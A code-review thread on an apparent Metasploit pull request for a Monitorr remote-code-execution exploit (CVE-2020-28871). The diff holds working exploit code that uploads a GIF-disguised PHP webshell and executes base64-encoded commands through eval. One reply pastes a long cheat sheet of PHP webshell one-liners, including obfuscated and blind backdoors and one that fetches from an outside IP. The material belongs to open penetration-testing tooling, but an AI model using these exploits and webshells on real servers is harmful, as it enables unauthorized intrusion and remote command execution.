modules/exploits/multi/http/monitorr_webshell_rce_cve_2020_28871.rb

```diff
@@ -0,0 +1,236 @@
+    if datastore['WEBSHELL'].blank?
+      @webshell_name = "#{Rex::Text.rand_text_alpha_lower(8..16)}.php"
+    else
+      @webshell_name = datastore['WEBSHELL'].to_s.downcase
+    end
+
+    # construct multipart form data
+    form_data = Rex::MIME::Message.new
+    form_data.add_part(payload.prepend("GIF89a#{rand_text_numeric(6..8)}"), 'image/gif', 'binary', "form-data; name=\"fileToUpload\"; filename=\"#{@webshell_name}\"")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'assets', 'php', 'upload.php'),
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'data' => form_data.to_s
+    })
+    return false unless res && res.code == 200 && !res.body.blank?
+
+    # parse HTML response to find the id with value 'uploadok' that indicates a successful upload
+    html = res.get_html_document
+    if html.at('div[@id="uploadok"]')
+      return true
+    else
+      return false
+    end
+  end
+
+  def check_vuln
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'assets', 'js', 'version', 'version.txt'),
+      'ctype' => 'application/x-www-form-urlencoded'
+    })
+    if res && res.code == 200 && !res.body.blank?
+      return res.body
+    else
+      return nil
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    php_cmd_function = Base64.strict_encode64(datastore['COMMAND'])
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'assets', 'data', 'usrimg', @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        @get_param => php_cmd_function
+      },
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'assets', 'data', 'usrimg', @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def check
+    version = check_vuln
+    if version.nil?
+      Exploit::CheckCode::Safe
+    else
+      return CheckCode::Vulnerable("Monitorr version: #{version}") if version =~ /1.7.6/
+
+      return CheckCode::Appears("Monitorr version: #{version}")
+    end
+  end
+
+  def exploit
+    # select webshell depending on the target setting (PHP or others).
+    # randomize and encode all parameters to obfuscate the payload and execution
+    @post_param = Rex::Text.rand_text_alphanumeric(1..8)
+    @get_param = Rex::Text.rand_text_alphanumeric(1..8)
+
+    if target['Type'] == :php
+      @webshell = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
```

Comment:
Shouldn't this use metasploit's PHP payload instead of hardcoding one?

Reply:
@jvoisin I am actually using the Metasploit PHP payload. The webshell is just the wrapper that executes the Metasploit PHP code that gets delivered via the `post_param`, decoded  and executed thru the PHP `eval` function. Just do a Google search for `PHP webshells` and you will find tons of them ;-)
```
<?php system($_GET["cmd"]); ?>
<?php system($_GET[1]); ?>
<?php system("`$_GET[1]`"); ?>
<?= system($_GET[cmd]);
<?=`$_GET[1]`;
<?php eval($_POST[cmd]);?>
<?php echo `$_GET[1]`;
<?php echo passthru($_GET['cmd']);
<?php echo shell_exec($_GET['cmd']);
<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
<script language="php">system("id"); </script>

<?php $_GET['a']($_GET['b']); ?>
// a=system&b=ls
// a=assert&b=system("ls")

<?php array_map("ass\x65rt",(array)$_REQUEST['cmd']);?>
// .php?cmd=system("ls")

<?@extract($_REQUEST);@die($f($c));?>
// .php?f=system&c=id

<?php @include($_FILES['u']['tmp_name']);  
// 構造 <form action="http://x.x.x.x/shell.php" method="POST" enctype="multipart/form-data">上傳
// 把暫存檔include進來
// From: http://www.zeroplace.cn/article.asp?id=906

<?php $x=~¾¬¬º­«;$x($_GET['a']); ?>
// not backdoor (assert)
// .php?a=system("ls")

echo "{${phpinfo()}}";

echo "${system(ls)}";

echo Y2F0IGZsYWc= | base64 -d | sh
// Y2F0IGZsYWc=   =>  cat  flag

echo -e "<?php passthru(\$_POST[1])?>;\r<?php echo 'A PHP Test ';" > shell.php
// cat shell.php
// <?php echo 'A PHP Test ';" ?>

echo ^<?php eval^($_POST['a']^); ?^> > a.php
// Windows echo導出一句話

<?php fwrite(fopen("gggg.php","w"),"<?php system(\$_GET['a']);");

<?php
header('HTTP/1.1 404');
ob_start();
phpinfo();
ob_end_clean();
?>

<?php 
// 無回顯後門  
// e.g. ?pass=file_get_contents('http://15.165.0.114/test')
ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();
?>

<?=
// 沒有英數字的webshell
$💩 = '[[[[@@' ^ '("(/%-';
$💩(('@@['^'#!/')." /????");


A=fl;B=ag;cat $A$B
```

Reply:
Yes, metasploit has such a thing, like in https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/php/base64.rb and https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/php.rb

Reply:
Aha, did not know this. Do you have any examples how to apply these?

Reply:
I might be wrong, but @jvoisin might be referencing the `Msf::Exploit::PhpEXE` mixin. `get_write_exec_payload()` will generate a php stager that will write a native payload to disk. I haven't personally used it, but there are a few modules that do, and here's some documentation: https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-phpexe-to-exploit-an-arbitrary-file-upload-bug.html. FWIW there are also modules that use a similar method as this module to write a native payload to disk as well.